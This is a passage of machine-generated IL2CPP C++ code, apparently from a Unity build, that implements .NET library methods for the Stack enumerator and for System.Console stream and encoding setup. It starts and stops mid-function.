(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, StackEnumerator_MoveNext_m7C00619A440FB2C12C0A5C3C8CEB934250C3DE22_RuntimeMethod_var); } IL_0023: { int32_t L_5 = __this->get__index_1(); if ((!(((uint32_t)L_5) == ((uint32_t)((int32_t)-2))))) { goto IL_0068; } } { Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * L_6 = __this->get__stack_0(); int32_t L_7 = L_6->get__size_1(); __this->set__index_1(((int32_t)il2cpp_codegen_subtract((int32_t)L_7, (int32_t)1))); int32_t L_8 = __this->get__index_1(); int32_t L_9 = ((((int32_t)((((int32_t)L_8) < ((int32_t)0))? 1 : 0)) == ((int32_t)0))? 1 : 0); G_B4_0 = L_9; if (!L_9) { G_B5_0 = L_9; goto IL_0067; } } { Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * L_10 = __this->get__stack_0(); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_11 = L_10->get__array_0(); int32_t L_12 = __this->get__index_1(); int32_t L_13 = L_12; RuntimeObject * L_14 = (L_11)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_13)); __this->set_currentElement_3(L_14); G_B5_0 = G_B4_0; } IL_0067: { return (bool)G_B5_0; } IL_0068: { int32_t L_15 = __this->get__index_1(); if ((!(((uint32_t)L_15) == ((uint32_t)(-1))))) { goto IL_0073; } } { return (bool)0; } IL_0073: { int32_t L_16 = __this->get__index_1(); V_0 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_16, (int32_t)1)); int32_t L_17 = V_0; __this->set__index_1(L_17); int32_t L_18 = V_0; int32_t L_19 = ((((int32_t)((((int32_t)L_18) < ((int32_t)0))? 1 : 0)) == ((int32_t)0))? 1 : 0); G_B9_0 = L_19; if (!L_19) { G_B10_0 = L_19; goto IL_00a6; } } { Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * L_20 = __this->get__stack_0(); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_21 = L_20->get__array_0(); int32_t L_22 = __this->get__index_1(); int32_t L_23 = L_22; RuntimeObject * L_24 = (L_21)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_23)); __this->set_currentElement_3(L_24); return (bool)G_B9_0; } IL_00a6: { __this->set_currentElement_3(NULL); return (bool)G_B10_0; } } // System.Object System.Collections.Stack/StackEnumerator::get_Current() extern "C" IL2CPP_METHOD_ATTR RuntimeObject * StackEnumerator_get_Current_m648842035EE50845BF314430E0FFBF33A4983C22 (StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (StackEnumerator_get_Current_m648842035EE50845BF314430E0FFBF33A4983C22_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = __this->get__index_1(); if ((!(((uint32_t)L_0) == ((uint32_t)((int32_t)-2))))) { goto IL_001a; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral700336D6AF60425DC8D362092DE4C0FFB8576432, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_2 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, StackEnumerator_get_Current_m648842035EE50845BF314430E0FFBF33A4983C22_RuntimeMethod_var); } IL_001a: { int32_t L_3 = __this->get__index_1(); if ((!(((uint32_t)L_3) == ((uint32_t)(-1))))) { goto IL_0033; } } { String_t* L_4 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral672E8F4CE93C075F32B4FD6C0D0EDAC1BDDB9469, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_5 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_5, L_4, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_5, NULL, StackEnumerator_get_Current_m648842035EE50845BF314430E0FFBF33A4983C22_RuntimeMethod_var); } IL_0033: { RuntimeObject * L_6 = __this->get_currentElement_3(); return L_6; } } // System.Void System.Collections.Stack/StackEnumerator::Reset() extern "C" IL2CPP_METHOD_ATTR void StackEnumerator_Reset_m72AB015F4BB163EC9DC19457743EF309A4C24187 (StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (StackEnumerator_Reset_m72AB015F4BB163EC9DC19457743EF309A4C24187_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = __this->get__version_2(); Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * L_1 = __this->get__stack_0(); int32_t L_2 = L_1->get__version_2(); if ((((int32_t)L_0) == ((int32_t)L_2))) { goto IL_0023; } } { String_t* L_3 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFAD66767010E09AA6ADD07FA89C43A7F43F44049, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_4 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, StackEnumerator_Reset_m72AB015F4BB163EC9DC19457743EF309A4C24187_RuntimeMethod_var); } IL_0023: { __this->set__index_1(((int32_t)-2)); __this->set_currentElement_3(NULL); return; } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.CompatibilitySwitches::.cctor() extern "C" IL2CPP_METHOD_ATTR void CompatibilitySwitches__cctor_m799C886CC771EE2F855A0BE665BCA5EF0FEE2237 (const RuntimeMethod* method) { { return; } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.Console::.cctor() extern "C" IL2CPP_METHOD_ATTR void Console__cctor_m44FB48190CE1DCE878B95D9D397D29C7527BEE44 (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Console__cctor_m44FB48190CE1DCE878B95D9D397D29C7527BEE44_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; Exception_t * __last_unhandled_exception = 0; NO_UNUSED_WARNING (__last_unhandled_exception); Exception_t * __exception_local = 0; NO_UNUSED_WARNING (__exception_local); int32_t __leave_target = -1; NO_UNUSED_WARNING (__leave_target); { InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A * L_0 = (InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A *)il2cpp_codegen_object_new(InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A_il2cpp_TypeInfo_var); InternalCancelHandler__ctor_m82D5D85CC1F50839540B6072DFCADAD07F6223FF(L_0, NULL, (intptr_t)((intptr_t)Console_DoConsoleCancelEvent_mBC4C4C488FCE021441F2C1D5A25D86F2F8A94FDD_RuntimeMethod_var), /*hidden argument*/NULL); ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_cancel_handler_6(L_0); bool L_1 = Environment_get_IsRunningOnWindows_m450E4F44CC5B040187C3E0E42B129780FABE455D(/*hidden argument*/NULL); if (!L_1) { goto IL_004b; } } IL_0018: try { // begin try (depth: 1) IL2CPP_RUNTIME_CLASS_INIT(WindowsConsole_tE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_il2cpp_TypeInfo_var); int32_t L_2 = WindowsConsole_GetInputCodePage_m492EDD139F7E66A90971A069FA4DD63000F77B4F(/*hidden argument*/NULL); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_3 = Encoding_GetEncoding_m0F51F30DFDD74D989E27C58C53FC82718CC51F68(L_2, /*hidden argument*/NULL); ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_inputEncoding_3(L_3); int32_t L_4 = WindowsConsole_GetOutputCodePage_mAF546B0FBC6558F7F2636A86E8733AD4AD2C4DE3(/*hidden argument*/NULL); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_5 = Encoding_GetEncoding_m0F51F30DFDD74D989E27C58C53FC82718CC51F68(L_4, /*hidden argument*/NULL); ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_outputEncoding_4(L_5); goto IL_008e; } // end try (depth: 1) catch(Il2CppExceptionWrapper& e) { __exception_local = (Exception_t *)e.ex; if(il2cpp_codegen_class_is_assignable_from (RuntimeObject_il2cpp_TypeInfo_var, il2cpp_codegen_object_class(e.ex))) goto CATCH_0038; throw e; } CATCH_0038: { // begin catch(System.Object) Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_6 = Encoding_get_Default_m625C78C2A9A8504B8BA4141994412513DC470CE2(/*hidden argument*/NULL); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_7 = L_6; ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_outputEncoding_4(L_7); ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_inputEncoding_3(L_7); goto IL_008e; } // end catch (depth: 1) IL_004b: { V_0 = 0; IL2CPP_RUNTIME_CLASS_INIT(EncodingHelper_t1A078DCE9CF2B3578DA8CAFE03FB9FFABD00EBB3_il2cpp_TypeInfo_var); EncodingHelper_InternalCodePage_m40D628F42FC6E0B635B21496F0BA71A00B009432((int32_t*)(&V_0), /*hidden argument*/NULL); int32_t L_8 = V_0; if ((((int32_t)L_8) == ((int32_t)(-1)))) { goto IL_007e; } } { int32_t L_9 = V_0; if ((((int32_t)((int32_t)((int32_t)L_9&(int32_t)((int32_t)268435455)))) == ((int32_t)3))) { goto IL_006c; } } { int32_t L_10 = V_0; if (!((int32_t)((int32_t)L_10&(int32_t)((int32_t)268435456)))) { goto IL_007e; } } IL_006c: { IL2CPP_RUNTIME_CLASS_INIT(EncodingHelper_t1A078DCE9CF2B3578DA8CAFE03FB9FFABD00EBB3_il2cpp_TypeInfo_var); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_11 = EncodingHelper_get_UTF8Unmarked_mDC45343C3BA5B14AD998D36344DDFD0B7068E335(/*hidden argument*/NULL); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_12 = L_11; ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_outputEncoding_4(L_12); ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_inputEncoding_3(L_12); goto IL_008e; } IL_007e: { Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_13 = Encoding_get_Default_m625C78C2A9A8504B8BA4141994412513DC470CE2(/*hidden argument*/NULL); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_14 = L_13; ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_outputEncoding_4(L_14); ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_inputEncoding_3(L_14); } IL_008e: { Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_15 = ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->get_inputEncoding_3(); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_16 = ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->get_outputEncoding_4(); Console_SetupStreams_m6CC1706E3A1838A0C710F3053EF589C7BA934065(L_15, L_16, /*hidden argument*/NULL); return; } } // System.Void System.Console::SetupStreams(System.Text.Encoding,System.Text.Encoding) extern "C" IL2CPP_METHOD_ATTR void Console_SetupStreams_m6CC1706E3A1838A0C710F3053EF589C7BA934065 (Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___inputEncoding0, Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___outputEncoding1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Console_SetupStreams_m6CC1706E3A1838A0C710F3053EF589C7BA934065_MetadataUsageId); s_Il2CppMethodInitialized = true; } { bool L_0 = Environment_get_IsRunningOnWindows_m450E4F44CC5B040187C3E0E42B129780FABE455D(/*hidden argument*/NULL); if (L_0) { goto IL_005d; } } { IL2CPP_RUNTIME_CLASS_INIT(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var); bool L_1 = ConsoleDriver_get_IsConsole_m0C19F307DCAEDCC678CF0ABA69F8EF083090C731(/*hidden argument*/NULL); if (!L_1) { goto IL_005d; } } { IL2CPP_RUNTIME_CLASS_INIT(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var); Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * L_2 = Console_OpenStandardInput_m70507BD4CEF7AAFB01030995036454D9D6F4BC98(0, /*hidden argument*/NULL); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_3 = ___inputEncoding0; CStreamReader_t8B3DE8C991DCFA6F4B913713009C5C9B5E57507D * L_4 = (CStreamReader_t8B3DE8C991DCFA6F4B913713009C5C9B5E57507D *)il2cpp_codegen_object_new(CStreamReader_t8B3DE8C991DCFA6F4B913713009C5C9B5E57507D_il2cpp_TypeInfo_var); CStreamReader__ctor_m0522E27BADB6649A8E512728F900EFFA4DBD301A(L_4, L_2, L_3, /*hidden argument*/NULL); ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_stdin_2(L_4); Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * L_5 = Console_OpenStandardOutput_m9C602CA7C2D5E989D45913987E2E581481EC9823(0, /*hidden argument*/NULL); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_6 = ___outputEncoding1; CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450 * L_7 = (CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450 *)il2cpp_codegen_object_new(CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450_il2cpp_TypeInfo_var); CStreamWriter__ctor_m967462FE0368BE80A448F0082E70B326088E2E95(L_7, L_5, L_6, (bool)1, /*hidden argument*/NULL); CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450 * L_8 = L_7; VirtActionInvoker1< bool >::Invoke(21 /* System.Void System.IO.StreamWriter::set_AutoFlush(System.Boolean) */, L_8, (bool)1); IL2CPP_RUNTIME_CLASS_INIT(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0_il2cpp_TypeInfo_var); TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * L_9 = TextWriter_Synchronized_m09204B9D335A228553F62AB1588490109E5DCD86(L_8, /*hidden argument*/NULL); ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_stdout_0(L_9); Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * L_10 = Console_OpenStandardError_mC6642ADBF10786E986FCA8E8708C35566A54137F(0, /*hidden argument*/NULL); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_11 = ___outputEncoding1; CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450 * L_12 = (CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450 *)il2cpp_codegen_object_new(CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450_il2cpp_TypeInfo_var); CStreamWriter__ctor_m967462FE0368BE80A448F0082E70B326088E2E95(L_12, L_10, L_11, (bool)1, /*hidden argument*/NULL); CStreamWriter_t6B662CA496662AF63D81722DCA99094893C80450 * L_13 = L_12; VirtActionInvoker1< bool >::Invoke(21 /* System.Void System.IO.StreamWriter::set_AutoFlush(System.Boolean) */, L_13, (bool)1); TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * L_14 = TextWriter_Synchronized_m09204B9D335A228553F62AB1588490109E5DCD86(L_13, /*hidden argument*/NULL); ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_stderr_1(L_14); goto IL_00ad; } IL_005d: { IL2CPP_RUNTIME_CLASS_INIT(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var); Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * L_15 = Console_OpenStandardInput_m70507BD4CEF7AAFB01030995036454D9D6F4BC98(0, /*hidden argument*/NULL); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_16 = ___inputEncoding0; UnexceptionalStreamReader_t30F0B3E16EAB998688D1AA23E2A6F3E6590E41EA * L_17 = (UnexceptionalStreamReader_t30F0B3E16EAB998688D1AA23E2A6F3E6590E41EA *)il2cpp_codegen_object_new(UnexceptionalStreamReader_t30F0B3E16EAB998688D1AA23E2A6F3E6590E41EA_il2cpp_TypeInfo_var); UnexceptionalStreamReader__ctor_m66258235565573CF051C6F053EADEEF9A67A084D(L_17, L_15, L_16, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A_il2cpp_TypeInfo_var); TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A * L_18 = TextReader_Synchronized_mAC0571B77131073ED9B627C8FEE2082CB28EDA9D(L_17, /*hidden argument*/NULL); ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_stdin_2(L_18); Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * L_19 = Console_OpenStandardOutput_m9C602CA7C2D5E989D45913987E2E581481EC9823(0, /*hidden argument*/NULL); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_20 = ___outputEncoding1; UnexceptionalStreamWriter_t15265DC169F829537681A0A5A1826F6713ABC1CB * L_21 = (UnexceptionalStreamWriter_t15265DC169F829537681A0A5A1826F6713ABC1CB *)il2cpp_codegen_object_new(UnexceptionalStreamWriter_t15265DC169F829537681A0A5A1826F6713ABC1CB_il2cpp_TypeInfo_var); UnexceptionalStreamWriter__ctor_m4504DBFFC2C8A76C6BA8BB0EE18630E32D03C772(L_21, L_19, L_20, /*hidden argument*/NULL); UnexceptionalStreamWriter_t15265DC169F829537681A0A5A1826F6713ABC1CB * L_22 = L_21; VirtActionInvoker1< bool >::Invoke(21 /* System.Void System.IO.StreamWriter::set_AutoFlush(System.Boolean) */, L_22, (bool)1); IL2CPP_RUNTIME_CLASS_INIT(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0_il2cpp_TypeInfo_var); TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * L_23 = TextWriter_Synchronized_m09204B9D335A228553F62AB1588490109E5DCD86(L_22, /*hidden argument*/NULL); ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_stdout_0(L_23); Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * L_24 = Console_OpenStandardError_mC6642ADBF10786E986FCA8E8708C35566A54137F(0, /*hidden argument*/NULL); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_25 = ___outputEncoding1; UnexceptionalStreamWriter_t15265DC169F829537681A0A5A1826F6713ABC1CB * L_26 = (UnexceptionalStreamWriter_t15265DC169F829537681A0A5A1826F6713ABC1CB *)il2cpp_codegen_object_new(UnexceptionalStreamWriter_t15265DC169F829537681A0A5A1826F6713ABC1CB_il2cpp_TypeInfo_var); UnexceptionalStreamWriter__ctor_m4504DBFFC2C8A76C6BA8BB0EE18630E32D03C772(L_26, L_24, L_25, /*hidden argument*/NULL); UnexceptionalStreamWriter_t15265DC169F829537681A0A5A1826F6713ABC1CB * L_27 = L_26; VirtActionInvoker1< bool >::Invoke(21 /* System.Void System.IO.StreamWriter::set_AutoFlush(System.Boolean) */, L_27, (bool)1); TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * L_28 = TextWriter_Synchronized_m09204B9D335A228553F62AB1588490109E5DCD86(L_27, /*hidden argument*/NULL); ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->set_stderr_1(L_28); } IL_00ad: { IL2CPP_RUNTIME_CLASS_INIT(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var); TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * L_29 = ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->get_stdout_0(); IL2CPP_RUNTIME_CLASS_INIT(GC_tC1D7BD74E8F44ECCEF5CD2B5D84BFF9AAE02D01D_il2cpp_TypeInfo_var); GC_SuppressFinalize_m037319A9B95A5BA437E806DE592802225EE5B425(L_29, /*hidden argument*/NULL); TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * L_30 = ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->get_stderr_1(); GC_SuppressFinalize_m037319A9B95A5BA437E806DE592802225EE5B425(L_30, /*hidden argument*/NULL); TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A * L_31 = ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->get_stdin_2(); GC_SuppressFinalize_m037319A9B95A5BA437E806DE592802225EE5B425(L_31, /*hidden argument*/NULL); return; } } // System.IO.TextWriter System.Console::get_Error() extern "C" IL2CPP_METHOD_ATTR TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * Console_get_Error_mE1078EFC5C7C133964838D2A72B8FB9567E4C98A (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Console_get_Error_mE1078EFC5C7C133964838D2A72B8FB9567E4C98A_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var); TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * L_0 = ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->get_stderr_1(); return L_0; } } // System.IO.Stream System.Console::Open(System.IntPtr,System.IO.FileAccess,System.Int32) extern "C" IL2CPP_METHOD_ATTR Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * Console_Open_mDAC2FE85ABE14206C01E7AA29617DAB54A2EA340 (intptr_t ___handle0, int32_t ___access1, int32_t ___bufferSize2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Console_Open_mDAC2FE85ABE14206C01E7AA29617DAB54A2EA340_MetadataUsageId); s_Il2CppMethodInitialized = true; } Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * V_0 = NULL; Exception_t * __last_unhandled_exception = 0; NO_UNUSED_WARNING (__last_unhandled_exception); Exception_t * __exception_local = 0; NO_UNUSED_WARNING (__exception_local); int32_t __leave_target = -1; NO_UNUSED_WARNING (__leave_target); IL_0000: try { // begin try (depth: 1) intptr_t L_0 = ___handle0; int32_t L_1 = ___access1; int32_t L_2 = ___bufferSize2; FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418 * L_3 = (FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418 *)il2cpp_codegen_object_new(FileStream_tA770BF9AF0906644D43C81B962C7DBC3BC79A418_il2cpp_TypeInfo_var); FileStream__ctor_mBBACDACB97FD9346AC2A5E164C86AB0BA0D160D6(L_3, (intptr_t)L_0, L_1, (bool)0, L_2, (bool)0, (bool)1, /*hidden argument*/NULL); V_0 = L_3; goto IL_0017; } // end try (depth: 1) catch(Il2CppExceptionWrapper& e) { __exception_local = (Exception_t *)e.ex; if(il2cpp_codegen_class_is_assignable_from (IOException_t60E052020EDE4D3075F57A1DCC224FF8864354BA_il2cpp_TypeInfo_var, il2cpp_codegen_object_class(e.ex))) goto CATCH_000e; throw e; } CATCH_000e: { // begin catch(System.IO.IOException) IL2CPP_RUNTIME_CLASS_INIT(Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7_il2cpp_TypeInfo_var); Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * L_4 = 